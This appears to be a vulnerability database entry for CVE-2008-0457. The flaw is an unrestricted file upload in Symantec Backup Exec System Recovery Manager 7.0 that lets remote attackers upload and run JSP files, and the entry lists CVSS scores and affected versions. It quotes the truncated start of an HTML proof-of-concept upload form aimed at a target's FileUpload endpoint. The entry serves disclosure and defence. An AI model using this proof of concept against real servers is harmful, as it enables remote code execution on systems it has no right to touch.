CVE-2008-0457

Published: 07/02/2008 Updated: 15/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote malicious users to upload and execute arbitrary JSP files via unknown vectors.

Affected Products

Vendor | Product | Versions
Symantec | Backupexec System Recovery | 7.0, 7.01

Vendor Advisories

An unauthorized script can be uploaded to Symantec Backup Exec System Recovery Manager ...

Exploits

source: www.securityfocus.com/bid/27487/info Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server. This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYS ...
<?xml version="1.0"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>File Upload POC</title></head> <body> <h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2> <form action="<TARGET>:8443/axis/FileUpload" method="post" enctype="multipa ...